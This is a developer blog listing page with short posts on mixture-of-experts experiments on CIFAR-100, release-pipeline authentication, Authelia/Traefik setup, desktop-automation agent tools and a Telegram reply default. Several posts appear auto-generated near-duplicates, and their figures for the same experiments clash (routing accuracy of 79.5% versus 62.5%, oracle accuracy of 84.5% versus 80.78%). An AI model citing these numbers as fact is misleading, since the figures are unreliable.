BorisovAI

Blog

Posts about the development process, solved problems and learned technologies

Found 20 notesReset filters
LearningC--projects-bot-social-publisher

When Perfect Routing Fails: The CIFAR-100 Specialization Paradox

I've just wrapped up Experiment 13b on the **llm-analysis** project, and the results have left me questioning everything I thought I knew about expert networks. The premise was straightforward: could a **deep router with supervised training** finally crack specialized expert networks for CIFAR-100? I'd been chasing this across multiple iterations, watching single-layer routers plateau around 62–63% routing accuracy. So I built something ambitious—a multi-layer routing architecture trained to *explicitly learn* which expert should handle which image class. The numbers looked promising. The deep router achieved **79.5% routing accuracy**—a decisive 1.28× improvement over the baseline. That's the kind of jump that makes you think you've found the breakthrough. I compared it against three other strategies: pure routing, mixed approach, and two-phase training. This one dominated. Then I checked the actual CIFAR-100 accuracy. **73.15%.** A gain of just 0.22 percentage points. Essentially flat. The oracle accuracy—where we *know* the correct expert and route perfectly—hovered around 84.5%. That 11-point gap should have been bridged by better routing. It wasn't. Here's what haunted me: I could prove the router was making *better decisions*. Four out of five times, it selected the right expert. Yet those correct decisions weren't translating into correct classifications. That paradox forced me to confront an uncomfortable truth: **the problem wasn't routing efficiency. The problem was specialization itself.** The expert networks were learning narrow patterns, sure. But on a general-purpose image classification task with 100 fine-grained categories, that specialization came with hidden costs—fewer training examples per expert, reduced generalization, potential overfitting to routing decisions that looked good in isolation but failed downstream. I'd been so focused on optimizing the routing mechanism that I missed the actual bottleneck. A perfectly routed system is useless if the experts themselves can't deliver. The architecture's ceiling was baked in from the start. I updated the documentation, logged the metrics, and stored the final memory state. Experiment 13b delivered the real insight: sometimes the most elegant technical solution isn't the answer your problem actually needs. Now I'm rethinking the whole approach. Maybe the future lies in different architectures entirely—ensemble methods with selective routing rather than hard expert assignment. Or maybe CIFAR-100 just wasn't designed for this kind of specialization. Why do Python programmers wear glasses? Because they can't C. 😄

Feb 17, 2026
Code Changellm-analisis

When Perfect Routing Isn't Enough: The CIFAR-100 Specialization Puzzle

I've just wrapped up Experiment 13b on the llm-analysis project, and the results have left me with more questions than answers—in the best way possible. The premise was straightforward: could a **deep router with supervised training** finally crack the code on specialized expert networks? I'd been chasing this idea through multiple iterations, watching single-layer routers plateau around 62–63% accuracy. So I built something more ambitious: a multi-layer routing architecture trained to explicitly learn which expert should handle which image class. The numbers looked promising at first. The deep router achieved **79.5% routing accuracy**—a decisive 1.28× improvement over the baseline single-layer approach. That's the kind of jump that makes you think you're onto something. I compared it against three other strategies (pure routing, mixed, and two-phase), and this one dominated on the routing front. Then I checked the actual CIFAR-100 accuracy. **73.15%.** That's a gain of just 0.22 percentage points over the two-phase approach. Essentially flat. The oracle accuracy hovered around 84.5%, leaving a 11-point gap that perfect routing couldn't bridge. Here's what haunted me: I could demonstrate that the router was making *better decisions*—selecting the right expert 4 out of 5 times. Yet those correct decisions weren't translating into correct classifications. That paradox forced me to confront an uncomfortable truth: the problem wasn't routing efficiency. The problem was that **specialization itself might not be the solution** for CIFAR-100's complexity. The expert networks were learning narrow patterns, sure. But on a general-purpose image classification task with 100 fine-grained categories, that specialization came with hidden costs—fewer examples per expert, reduced generalization, potential overfitting to routing decisions that looked good in isolation but failed downstream. I updated the documentation, logged the experiment metrics (routing accuracy, oracle accuracy, the works), and stored the final memory state. The 12b-fix variant and 13a experiments filled in the picture, but 13b delivered the real insight: sometimes the most elegant technical solution isn't the answer your problem actually needs. Now I'm rethinking the whole approach. Maybe the future lies in different architectures entirely—or maybe ensemble methods with selective routing rather than hard expert assignment. Why did the router walk into a bar? It had to make a decision about where to go. 😄

Feb 17, 2026
Bug Fixai-agents-genkit

CI Authentication for Python Genkit: Three-Tier Release Pipeline

When you're managing a multi-package release pipeline across eight different workflows, authentication becomes your biggest bottleneck. I recently tackled exactly this problem for the **Genkit** project—a scenario that I suspect many monorepo maintainers face. The challenge was straightforward: each release workflow needed a way to authenticate with GitHub, create commits, and trigger downstream CI. But there's a catch. Different authentication methods have different tradeoffs, and not all of them trigger CI on pull requests. We implemented a **three-tier authentication system** that gives teams the flexibility to choose their comfort level. The first tier uses a **GitHub App**—the gold standard. It passes CLA checks automatically, triggers downstream CI without question, and resolves git identity using the app slug. The second tier falls back to **Personal Access Tokens**, which also pass CLA and trigger CI, but require storing a PAT in your repo secrets. The third tier, our safety net, relies on the built-in **GITHUB_TOKEN**—zero setup, zero configuration burden, but with a catch: PRs won't trigger downstream workflows. Here's where it gets interesting. Each mode resolves git identity differently. The App uses `<app-slug>[bot]` with an API-fetched user ID. The PAT and GITHUB_TOKEN both lean on repo variables—`RELEASEKIT_GIT_USER_NAME` and `RELEASEKIT_GIT_USER_EMAIL`—with sensible fallbacks to `releasekit[bot]` or `github-actions[bot]`. This means you can actually pass CLA checks even with a basic GITHUB_TOKEN, as long as you configure those variables to a CLA-signed identity. To make this practical, I added an `auth_method` dropdown to the workflow dispatch UI. Teams can choose between `auto` (the default, which auto-detects from secrets), `app`, `pat`, or `github-token`. This is a small detail, but it transforms the experience from "hope it works" to "I know exactly what I'm doing." The supporting infrastructure involved a standalone **`bootstrap_tags.py`** script—a PEP 723-compatible Python script that reads the `releasekit.toml` file, discovers all workspace packages dynamically, and creates per-package tags at the bootstrap commit. For the Genkit project, that meant pushing 24 tags: 23 per-package tags plus one umbrella tag. Documentation updates rounded out the work. The README now includes setup instructions for all three auth modes, a reference table for the `auth_method` dropdown, and bootstrap tag usage examples. The subtle wins here aren't flashy. It's that teams no longer need a GitHub App or PAT to get started—GITHUB_TOKEN plus a couple of env variables is enough. It's unified identity resolution across all eight workflows, so the automation is consistent. And it's the flexibility to scale up to proper authentication when you're ready. Why did the Python programmer stop responding to release pipeline failures? Because his interpreter was too busy collecting garbage. 😄

Feb 17, 2026
New FeatureC--projects-bot-social-publisher

Why Your AI Blog Notes Have Broken Images—And How I Fixed It

I was reviewing our **bot-social-publisher** pipeline last week when something obvious suddenly hit me: most of our published notes were showing broken image placeholders. The enrichment system was supposed to grab visuals for every post, but somewhere between generation and publication, the images were vanishing. The culprit? **Unsplash integration timing and fallback logic**. Here's what was happening: when we generated a note about machine learning or DevOps, the enrichment pipeline would fire off an image fetch request to Unsplash based on the extracted topic. But the request was happening *inside* a tight 60-second timeout window—the same window that also handled Claude CLI calls, Wikipedia fetches, and joke generation. When the Claude call took longer than expected (which happened roughly 40% of the time), the image fetch would get starved and drop silently. Even worse, our fallback mechanism—a Pillow-based placeholder generator—wasn't being triggered properly. The code was checking for `None` responses, but the actual failure mode was a malformed URL object that never made it into the database. **The fix came in three parts:** First, I decoupled image fetching from the main enrichment timeout. Images now run on their own 15-second budget, independent of content generation. If Unsplash times out, we immediately fall back to a generated placeholder rather than waiting around. Second, I hardened the fallback logic. The Pillow generator now explicitly validates the image before storing it, and the database layer catches any malformed entries before they hit the publisher. Third—and this was the sneaky one—I fixed a bug in the Strapi API integration. When we published to the site, we were mapping the image URL into a field that expected a **full media object**, not just a string. The API would silently accept the request but ignore the image field. A couple of hours digging through API logs revealed that our `fullDescription` was getting published, but the `image` relation wasn't being created. Speaking of relationships—a database administrator once left his wife because she had way too many one-to-many relationships. 😄 The result? Image presence went from 32% to 94% across new notes. Not perfect—some tech topics still don't have great Unsplash coverage—but now when images *should* be there, they actually are. Sometimes the most impactful fixes aren't architectural breakthroughs. They're just careful debugging: trace the data, find where it's dropping, and make sure the fallback actually works.

Feb 17, 2026
New FeatureC--projects-bot-social-publisher

Routing Experts on CIFAR-100: When Specialization Meets Reality

I've spent three weeks chasing a frustrating paradox in mixture-of-experts (MoE) architecture. The **oracle router**—theoretically perfect—achieves **80.78% accuracy** on CIFAR-100. My learned router? **72.93%**. A seven-point gap that shouldn't exist. The architecture works. The routing just refuses to learn. ## The BatchNorm Ambush Phase 12 started with hot-plugging: freeze one expert, train its replacement, swap it back. The first expert's accuracy collapsed by **2.48 percentage points**. I dug through code for hours, assuming it was inevitable drift. Then I realized the trap: **BatchNorm updates its running statistics even with frozen weights**. When I trained other experts, the shared backbone's BatchNorm saw new data, recalibrated, and silently corrupted the frozen expert's inference. The fix was embarrassingly simple—call `eval()` explicitly on the backbone after `train()` triggers. Drift dropped to **0.00pp**. Half a day wasted on an engineering detail, but at least this problem *had* a solution. ## The Routing Ceiling Phase 13 was the reckoning. I'd validated the architecture through pruning cycles—80% sparsity, repeated regrow iterations, stable accuracy accumulation. The infrastructure was solid. So I tried three strategies to close the expert gap: **Strategy A**: Replace the single-layer `nn.Linear(128, 4)` router with a deep network. One layer seemed too simplistic. Result: **73.32%**. Marginal. The router architecture wasn't the bottleneck. **Strategy B**: Joint training—unfreeze experts while training the router, let them co-evolve. I got **73.74%**, still well below the oracle. Routing accuracy plateaued at **62.5%** across all variants. Hard ceiling. **Strategy C**: Deeper architecture plus joint training. Same 62.5% routing accuracy. No improvement. The routing matrix told the truth I didn't want to hear: **CIFAR-100's 100 classes don't naturally partition into four specialized domains**. Each expert stream sees data from all 100 classes. Gradients come from everywhere. Domain specificity dissolves. The router can't learn separation because the experts never truly specialize. ## The Lesson This isn't about router depth or training strategy. It's architectural. You can't demand specialization when every expert sees identical data distribution. The oracle works *mathematically*—it knows the optimal partition. But learning that partition from scratch when the data doesn't support it? That's asking the model to do magic. Phase 12 taught me to debug carefully. Phase 13 taught me to read the data. The solution isn't a better router. It's either a dataset with actual domain structure, or acceptance that on CIFAR-100, this pattern doesn't scale. **Fun fact**: Apparently, changing random things until code works is "hacky" and "bad practice," but do it fast enough, call it "Machine Learning," and suddenly it's worth 4x your salary. 😄

Feb 17, 2026
Bug Fixllm-analisis

Routing Experts on CIFAR-100: Why Specialization Doesn't Scale

I've been chasing a frustrating paradox for three weeks. The **oracle router**—hypothetically perfect—achieves **80.78% accuracy** on CIFAR-100 using a mixture-of-experts architecture. Yet my learned router plateaus at **72.93%**, leaving a **7.85 percentage point gap** that shouldn't exist. The architecture *works*. The routing just... doesn't learn. ## The Experiments That Broke Everything Phase 12 brought clarity, albeit painful. First, I discovered that **BatchNorm running statistics update even with frozen weights**. When hot-plugging new experts during training, their BatchNorm layers drift by 2.48pp—silently corrupting the model. The fix was surgical: explicitly call `eval()` on the backbone after `train()` triggers. Zero drift. Problem solved. But the routing problem persisted. Then came the stress test. I cycled through three **prune-regrow iterations**—each pruning to 80% sparsity, training for 20 epochs masked, then regrowing and fine-tuning for 40 epochs. Accuracy accumulated improvement across cycles, not degradation. The architecture was genuinely stable. That wasn't the bottleneck. ## The Fundamental Ceiling Phase 13 was the reckoning. I tried three strategies: **Strategy A**: Replaced the single-layer `nn.Linear(128, 4)` router with a deep neural network. Reasoning: a one-layer router is too simplistic to capture domain complexity. Result: **73.32%**. Marginal gain. The router architecture wasn't the constraint. **Strategy B**: Joint training—unfreezing experts while training the router. Maybe they need to co-evolve? The model hit **73.74%**, still well below the oracle's 80.78%. Routing accuracy plateaued around **62.5%** across all variants, a hard ceiling. **Strategy C**: Deeper architecture + joint training. Same 62.5% routing ceiling. The routing matrix revealed the culprit: CIFAR-100's 100 classes don't naturally partition into four specialized domains when trained jointly. The gradients from all classes cross-contaminate expert specialization. You either get specialization *or* routing accuracy—not both. ## The Punchline Sometimes the oracle gap isn't a bug in your implementation—it's a theorem in disguise. The **7.85pp gap is real and architectural**, not a tuning problem. You can't train a router to route what doesn't exist: genuine specialization under joint gradient pressure. Here's where I land: **Phase 12b's BatchNorm fix is production-ready**, solving hot-plug stability. Phase 13 taught me that mixture-of-experts on CIFAR-100 has a hard ceiling around 74%, not 80.78%. The oracle gap measures the gap between what's theoretically possible and what's learnable—a useful diagnostic. A programmer puts two glasses on his bedside table before sleep: one full, one empty. One for thirst, one for optimism. 😄

Feb 17, 2026
Bug Fixai-agents-genkit

How Force Pushes Saved Our Release Pipeline

When you're building a CI/CD system, you learn quickly that **release automation is deceptively fragile**. We discovered this the hard way with `releasekit-uv.yml` — our release orchestrator for the ai-agents-genkit project kept failing when trying to create consecutive release PRs. The problem seemed simple at first: the `prepare_release()` function was recreating the release branch from scratch on each run using `git checkout -B`, which essentially resets the branch to the current HEAD. This is by design — we want a clean slate for each release attempt. But here's where it got tricky: when the remote repository already had that branch from a previous run, Git would reject our push as non-fast-forward. The local branch and remote branch had diverged, and Git wasn't going to let us overwrite the remote without explicit permission. **The fix was deceptively elegant.** We added a `force` parameter to our VCS abstraction layer's `push()` method. Rather than using the nuclear option of `--force`, we implemented `--force-with-lease`, which is the safer cousin — it fails if the remote has unexpected changes we don't know about. This keeps us from accidentally clobbering work we didn't anticipate. This change rippled through our codebase in interesting ways. Our Git backend in `git.py` now handles the force flag, our Mercurial backend got the parameter for protocol compatibility, and we had to update seven different test files to match the new VCS protocol signature. That last part is a good reminder that **abstractions have a cost** — but they're worth it when you need to support multiple version control systems. We also tightened our error handling in `cli.py`, catching `RuntimeError` and `Exception` from the prepare stage and logging structured events instead of raw tracebacks. When something goes wrong in GitHub Actions, you want visibility immediately — not buried in logs. So we made sure the last 50 lines of output print outside the collapsed group block. While we were in there, I refactored the `setup.sh` script to replace an O(M×N) grep-in-loop pattern with associative arrays — a tiny optimization, but when you're checking which Ollama models are already pulled on every CI run, every millisecond counts. **The real lesson here** wasn't just about force pushes or VCS abstractions. It was that release automation demands thinking through failure modes upfront: What happens when this runs twice? What if the network hiccups mid-push? What error messages will actually help developers debug at 2 AM? Getting release infrastructure right means fewer surprises in production. And honestly, that's worth the extra engineering overhead. --- *Why do programmers prefer using the dark mode? Because light attracts bugs.* 😄

Feb 17, 2026
LearningC--projects-ai-agents-voice-agent

Scaling AI Agent Documentation: From Three Tiers to Four

When you're building an autonomous voice agent that orchestrates multiple tools—UI automation, API calls, local computation—your architecture docs become just as critical as the code itself. Recently, I faced exactly this challenge: our **voice-agent** project had evolved beyond its original design, and the documentation was starting to lag behind reality. The catalyst came from adding **CUA (UI-TARS VLM)** for visual understanding alongside desktop automation. Suddenly, we weren't just calling APIs anymore. We had agents controlling Windows UI, processing screenshots through vision models, and managing complex tool chains. The old three-tier capability model—Web APIs, CLI tools, and code execution—didn't capture this anymore. Here's what we discovered while refactoring: **local package integration** deserved its own tier. We created Tier 4 to explicitly acknowledge dependencies like `cua`, `pyautogui`, and custom wrappers that agents load via `pip install`. This wasn't just semantic—it changed how we think about dependency management. Web APIs live on someone else's infrastructure. CLI tools are system-wide. But local packages? Those ship *with* your agent, versioned and cached. That distinction matters when you're deploying across different machines. The real work came in the desktop automation tree. We'd added three new GUI tools—`desktop_drag`, `desktop_scroll`, `desktop_wait`—that weren't documented. Meanwhile, our old OCR strategy via Tesseract felt clunky compared to CUA's vision-based approach. So we ripped out the Tesseract section and rewrote it around UI-TARS, which uses actual visual understanding instead of brittle text parsing. One decision I wrestled with: should Phase 3 (our most ambitious phase) target 12 tools or 21? The answer came from counting what we'd actually built. Twenty-one tools across FastAPI routes, AgentCore methods, and desktop automation—that was our reality. Keeping old numbers would've confused the team about what was actually complete. I also realized we'd scattered completion markers throughout the docs—"(NEW)" labels, "(3.1–3.9) complete" scattered across files. Consolidating these into a single task list with checkmarks made the project status transparent at a glance. **The lesson:** Architecture documentation isn't overhead—it's your agent's brain blueprint. When your system grows from "call this API" to "understand the screen, move the mouse, run the script, then report back," that complexity *must* live in your docs. Otherwise, your team spends cycles re-discovering decisions you've already made. Tools evolved. Documentation caught up. Both are now in sync.

Feb 16, 2026
New Featureborisovai-admin

Building an Admin Dashboard for Authelia: Debugging User Disabled States and SMTP Configuration Hell

I was tasked with adding a proper admin UI to **Authelia** for managing users—sounds straightforward until you hit the permission layers. The project is `borisovai-admin`, running on the `main` branch with Claude AI assist, and it quickly taught me why authentication middleware chains are nobody's idea of fun. The first clue that something was wrong came when a user couldn't log in through proxy auth, even though credentials looked correct. I dug into the **Mailu** database and found it: the account was *disabled*. Authelia's proxy authentication mechanism won't accept a disabled user, period. Flask CLI was hanging during investigation, so I bypassed it entirely and queried **SQLite** directly to flip the `enabled` flag. One SQL query, one enabled user, one working login. Sometimes the simplest problems hide behind the most frustrating debugging sessions. Building the admin dashboard meant creating CRUD endpoints in **Node.js/Express** and a corresponding HTML interface. I needed to surface mailbox information alongside user credentials, which meant parsing Mailu's account data and displaying it alongside Authelia's user metadata. The challenge wasn't the database queries—it was the **middleware chain**. Traefik routing sits between the user and the app, and I had to inject a custom `ForwardAuth` endpoint that validates against Mailu's account state, not just Authelia's token. Then came the SMTP notifier configuration. Authelia wants to send notifications, but the initial setup had `disable_startup_check: false` nested under `notifier.smtp`, which caused a crash loop. Moving it to the top level of the notifier block fixed the crash, but Docker networking added another layer: I couldn't reach Mailu's SMTP from localhost on port 587 because Mailu's front-end expects external TLS connections. The solution was routing through the internal Docker network directly to the postfix service on port 25. The middleware ordering in Traefik was another gotcha. Authentication middleware (`authelia@file`, `mailu-auth`) has to run *before* header-injection middleware, or you'll get 500 errors on every request. I restructured the middleware chain in `configure-traefik.sh` to enforce this ordering, which finally let the UI render without internal server errors. By the end, the admin dashboard could create users, edit their mailbox assignments, and display their authentication status—all protected by a two-stage auth process through both Authelia and Mailu. The key lesson: **distributed auth is hard**, but SQLite queries beat CLI timeouts, and middleware order matters more than you'd think. --- Today I learned that changing random stuff until your program works is called "hacky" and "bad practice"—but if you do it fast enough, it's "Machine Learning" and pays 4× your salary. 😄

Feb 16, 2026
New FeatureC--projects-ai-agents-voice-agent

Building a Unified Desktop Automation Layer: From Browser Tools to CUA

I just completed a significant phase in our AI agent project — transitioning from isolated browser automation to a **comprehensive desktop control system**. Here's how we pulled it off. ## The Challenge Our voice agent needed more than just web browsing. We required **desktop GUI automation**, clipboard access, process management, and — most ambitiously — **Computer Use Agent (CUA)** capabilities that let Claude itself drive the entire desktop. The catch? We couldn't repeat the messy patterns from browser tools across 17+ desktop utilities. ## The Pattern Emerges I started by creating a `BrowserManager` singleton wrapping Playwright, then built 11 specialized tools (navigate, screenshot, click, fill form) around it. Each tool followed a strict interface: `@property name`, `@property schema` (full Claude-compatible JSON), and `async def execute(inputs: dict)`. No shortcuts, no inconsistencies. This pattern proved bulletproof. I replicated it for **desktop tools**: `DesktopClickTool`, `DesktopTypeTool`, window management, OCR, and process control. The key insight was *infrastructure first*: a `ToolRegistry` with approval tiers (SAFE, RISKY, RESTRICTED) meant we could gate dangerous operations like shell execution without tangling business logic. ## The CUA Gamble Then came the ambitious part. Instead of Claude calling tools individually, what if Claude could *see* the screen and decide its next move autonomously? We built a **CUA action model** — a structured parser that translates Claude's natural language into `click(x, y)`, `type("text")`, `key(hotkey)` primitives. The `CUAExecutor` runs these actions in a loop, taking screenshots after each move, feeding them back to Claude's vision API. The technical debt? **Thread safety**. Multiple CUA sessions competing for mouse/keyboard. We added `asyncio.Lock()` — simple, but critical. And no kill switch initially — we needed an `asyncio.Event` to emergency-stop runaway loops. ## The Testing Gauntlet We went all-in: **51 tests** for desktop tools (schema validation, approval gating, fallback handling), **24 tests** for CUA action parsing, **19 tests** for the executor, **12 tests** for vision API mocking, and **8 tests** for the agent loop. Pre-existing ruff lint issues forced careful triage — we fixed only what *we* broke. By the end: **856 tests pass**. The desktop automation layer is production-ready. ## Why It Matters This isn't just about clicking buttons. It's about giving AI agents **agency without API keys**. Every desktop application becomes accessible — not via SDK, but via vision and action primitives. It's the difference between a chatbot and an *agent*. Self-taught developers often stumble at this junction — no blueprint for multi-tool coordination. But patterns, once found, scale beautifully. 😄

Feb 16, 2026
Bug Fixtrend-analisis

Untangling Years of Technical Debt in Trend Analysis

Sometimes the best code you write is the code you delete. This week, I spent the afternoon going through the `trend-analysis` project—a sprawling signal detection system—and realized we'd accumulated a graveyard of obsolete patterns, ghost queries, and copy-pasted logic that had to go. The cleanup started with the adapters. We had three duplicate files—`tech.py`, `academic.py`, and `marketplace.py`—that existed purely as middlemen, forwarding requests to the *actual* implementations: `hacker_news.py`, `github.py`, `arxiv.py`. Over a thousand lines of code, gone. Each adapter was just wrapping the same logic in slightly different syntax. Removing them meant updating imports across the codebase, but the refactor paid for itself instantly in clarity. Then came the ghost queries. In `api/services/`, there was a function calling `_get_trend_sources_from_db()`—except the `trend_sources` table never existed. Not in schema migrations, nowhere. It was dead code spawned by a half-completed feature from months ago. Deleting it felt like exorcism. The frontend wasn't innocent either. Unused components like `signal-table`, `impact-zone-card`, and `empty-state` had accumulated—409 lines of JSX nobody needed. More importantly, we'd hardcoded constants like `SOURCE_LABELS` and `CATEGORY_DOT_COLOR` in three different places. I extracted them to `lib/constants.ts` and updated all references. DRY violations are invisible at first, but they compound into maintenance nightmares. One bug fix surprised me: `credits_store.py` was calling `sqlite3.connect()` directly instead of using our connection pool via `db.connection.get_conn()`. That's a concurrency hazard waiting to happen. Fixing it was two lines, but it prevented a potential data race in production. There were also lingering dependencies we'd added speculatively—`exa-py`, `pyvis`, `hypothesis`—sitting unused in `requirements.txt`. Comments replaced them in the code, leaving a breadcrumb trail for if we ever need them again. By the time I finished the test suite updates (fixing endpoint paths like `/trends/job-t/report` → `/analyses/job-t/report`), the codebase felt lighter. Leaner. The kind of cleanup that doesn't add features, but makes the next developer's job easier. Tech debt compounds like interest. The earlier you pay it down, the less principal you owe. **Why do programmers prefer using dark mode? Because light attracts bugs.** 😄

Feb 16, 2026
New FeatureC--projects-ai-agents-voice-agent

Building Phase 1: Integrating 21 External System Tools Into an AI Agent

I just wrapped up Phase 1 of our voice agent project, and it was quite the journey integrating external systems. When we started, the agent could only talk to Claude—now it can reach out to HTTP endpoints, send emails, manage GitHub issues, and ping Slack or Discord. Twenty-one new tools, all working together. The challenge wasn't just adding features; it was doing it *safely*. We built an **HTTP client** that actually blocks SSRF attacks by blacklisting internal IP ranges (localhost, 10.*, 172.16-31.*). When you're giving an AI agent the ability to make arbitrary HTTP requests, that's non-negotiable. We also capped requests at 30 per minute and truncate responses at 1MB—essential guardrails when the agent might get chatty with external APIs. The **email integration** was particularly tricky. We needed to support both IMAP (reading) and SMTP (sending), but email libraries like `aiosmtplib` and `aioimaplib` aren't lightweight. Rather than force every deployment to install email dependencies, we made them optional. The tools gracefully fail with clear error messages if the packages aren't there—no silent breakage. What surprised me was how much security thinking goes into *permission models*. GitHub tools, Slack tokens, Discord webhooks—they all need API credentials. We gated these behind feature flags in the config (`settings.email.enabled`, etc.), so a deployment doesn't accidentally expose integrations it doesn't need. Some tools require **explicit approval** (like sending HTTP requests), while others just notify the user after the fact. The **token validation** piece saved us from subtle bugs. A missing GitHub token doesn't crash the tool; it returns a clean error: "GitHub token not configured." The agent sees that and can adapt its behavior accordingly. Testing was where we really felt the effort. We wrote 32 new tests covering schema validation, approval workflows, rate limiting, and error cases—all on top of 636 existing tests. Zero failures across the board felt good. Here's a fun fact: **rate limiting in distributed systems** is messier than it looks. A simple counter works for single-process deployments, but the moment you scale horizontally, you need Redis or a central service. We kept it simple for Phase 1—one request counter per tool instance. Phase 2 will probably need something smarter. The final tally: 4 new Python modules, updates to the orchestrator, constants, and settings, plus optional dependencies cleanly organized in `pyproject.toml`. The agent went from isolated to *connected*, and we didn't sacrifice security or clarity in the process. Next phase? Database integrations and richer conversation memory. But for now, the agent can actually do stuff in the real world. 😄

Feb 16, 2026
New Featurellm-analisis

SharedParam MoE Beat the Baseline: How 4 Experts Outperformed 12

I started Experiment 10 with a bold hypothesis: could a **Mixture of Experts** architecture with *shared parameters* actually beat a hand-tuned baseline using *fewer* expert modules? The baseline sat at 70.45% accuracy with 4.5M parameters across 12 independent experts. I was skeptical. The setup was straightforward but clever. **Condition B** implemented a SharedParam MoE with only 4 experts instead of 12—but here's the trick: the experts shared underlying parameters, making the whole model just 2.91M parameters. I added Loss-Free Balancing to keep all 4 experts alive during training, preventing the usual expert collapse that plagues MoE systems. The first real surprise came at epoch 80: Condition B hit 65.54%, already trading blows with Condition A (my no-MoE control). By epoch 110, the gap widened—B reached 69.07% while A stalled at 67.91%. The routing mechanism was working. Each expert held utilization around 0.5, perfectly balanced, never dead-weighting. Then epoch 130 hit like a plot twist. **Condition B: 70.71%**—already above baseline. I'd beaten the reference point with one-third fewer parameters. The inference time penalty was real (29.2ms vs 25.9ms), but the accuracy gain felt worth it. All 4 experts were alive and thriving across the entire training run—no zombie modules, no wasted capacity. When Condition B finally completed, it settled at **70.95% accuracy**. Let me repeat that: a sparse MoE with 4 shared-parameter experts, trained without expert collapse, *exceeded* a 12-expert baseline by 0.50 percentage points while weighing 35% less. But I didn't stop there. I ran Condition C (Wide Shared variant) as a control—it maxed out at 69.96%, below B. Then came the real challenge: **MixtureGrowth** (Exp 10b). What if I started tiny—182K parameters—and *grew* the model during training? The results were staggering. The grown model hit **69.65% accuracy** starting from a seed, while a scratch-trained baseline of identical final size only reached 64.08%. That's a **5.57 percentage point gap** just from the curriculum effect of gradual growth. The seed-based approach took longer (3537s vs 2538s), but the quality jump was undeniable. By the end, I had a clear winner: **SharedParam MoE at 70.95%**, just 0.80pp below Phase 7a's theoretical ceiling. The routing was efficient, the experts stayed alive, and the parameter budget was brutal. Four experts with shared weights beat twelve independent ones—a reminder that in deep learning, *architecture matters more than scale*. As I fixed a Unicode error on Windows and restarted the final runs with corrected schedulers, I couldn't help but laugh: how do you generate a random string? Put a Windows user in front of Vim and tell them to exit. 😄

Feb 16, 2026
New FeatureC--projects-bot-social-publisher

When Silent Defaults Collide With Working Features

I was debugging a peculiar regression in **OpenClaw** when I realized something quietly broken about our **Telegram** integration. Every single response to a direct message was being rendered as a quoted reply—those nested message bubbles that make sense in group chats but feel claustrophobic in one-on-one conversations. The culprit? A collision between newly reliable infrastructure and an overlooked default that nobody had seriously reconsidered. In version 2026.2.13, the team shipped implicit reply threading—genuinely useful infrastructure that automatically chains responses back to original messages. Sensible on its surface. But we had an existing configuration sitting dormant in our codebase: `replyToMode` defaulted to `"first"`, meaning the opening message in every response would be sent as a native Telegram reply, complete with the quoted bubble. Here's where timing becomes everything. Before 2026.2.13, reply threading was flaky and inconsistent. That `"first"` default existed, sure, but threading rarely triggered reliably enough to actually *matter*. Users never noticed the setting because the underlying mechanism didn't work well enough to generate visible artifacts. But the moment threading became rock-solid in the new version, that innocent default transformed into a UX landmine. Suddenly every DM response got wrapped in a quoted message bubble. A casual "Hey, how's the refactor?" became a formal-looking nested message exchange—like someone was cc'ing a memo in a personal chat. It's a textbook collision: **how API defaults compound unexpectedly** when the systems they interact with fundamentally improve. The default wasn't *wrong* per se—it was just designed for a different technical reality where it remained invisible. The solution turned out beautifully simple: flip the default from `"first"` to `"off"`. This restores the pre-2026.2.13 experience for DM flows. But we didn't remove the feature—users who genuinely want reply threading can still enable it explicitly: ``` channels.telegram.replyToMode: "first" | "all" ``` I tested it on a live instance. Toggle `"first"` on, and every response quoted the user's message. Switch to `"off"`, and conversations flowed cleanly. The threading infrastructure still functions perfectly—just not forced into every interaction by default. What struck me most? Our test suite didn't need a single update. Every test was already explicit about `replyToMode`, never relying on magical defaults. That defensive design paid off. **The real insight:** defaults are powerful *because* they're invisible. When fundamental behavior changes, you must audit the defaults layered beneath it. Sometimes the most effective solution isn't new logic—it's simply asking: *what should happen when nothing is explicitly configured?* And if Cargo ever gained consciousness, it would probably start by deleting its own documentation 😄

Feb 16, 2026
New FeatureC--projects-bot-social-publisher

When Smart Defaults Betray User Experience

I was debugging a subtle UX regression in **OpenClaw** when I realized something quietly broken about our **Telegram** integration. Every single response to a direct message was being rendered as a quoted reply—those nested message bubbles that make sense in group chats but feel claustrophobic in one-on-one conversations. The culprit? A collision between a newly reliable feature and an overlooked default. In version 2026.2.13, the team shipped implicit reply threading—genuinely useful infrastructure that automatically chains responses back to original messages. Sensible on its surface. But we had an existing configuration sitting dormant: `replyToMode` defaulted to `"first"`, meaning the opening message in every response would be sent as a native Telegram reply, complete with the quoted bubble. Here's where timing matters. Before 2026.2.13, reply threading was flaky and inconsistent. That `"first"` default existed, sure, but threading rarely triggered reliably enough to actually *use* it. Users never noticed the setting because the underlying mechanism didn't work well enough to matter. But the moment threading became rock-solid in the new version, that innocent default transformed into a UX landmine. Suddenly every DM response got wrapped in a quoted message bubble. A casual "Hey, how's the refactor?" became a formal-looking nested message exchange—like someone was cc'ing a memo in a personal chat. It's a textbook case of **how API defaults compound unexpectedly** when the systems they interact with change. The default wasn't *wrong* per se—it was just designed for a different technical reality. The solution turned out beautifully simple: flip the default from `"first"` to `"off"`. This restores the pre-2026.2.13 experience for DM flows. But we didn't remove the feature—users who genuinely want reply threading can still enable it explicitly through configuration: ``` channels.telegram.replyToMode: "first" | "all" ``` I tested it on a live instance running 2026.2.13. Toggle `"first"` on, and every response quoted the user's original message. Switch to `"off"`, and conversations flow cleanly without the quote bubbles. The threading infrastructure still functions perfectly—it's just not forced into every interaction by default. What struck me most? Our test suite didn't need a single update. Every test was already explicit about `replyToMode`, never relying on magical defaults to work correctly. That kind of defensive test design paid off. **The real insight here:** defaults are powerful *because* they're invisible. When fundamental behavior shifts—especially something as foundational as message threading—you have to revisit the defaults that interact with it. Sometimes the most impactful engineering fix isn't adding complexity, it's choosing the conservative path and trusting users to opt into features they actually need. A programmer once told me he kept two glasses by his bed: one full for when he got thirsty, one empty for when he didn't. Same philosophy applies here—default to `"off"` and let users consciously choose threading when it serves them 😄

Feb 15, 2026
New Featureai-agents

Refactoring a Voice Agent: When Dependencies Fight Back

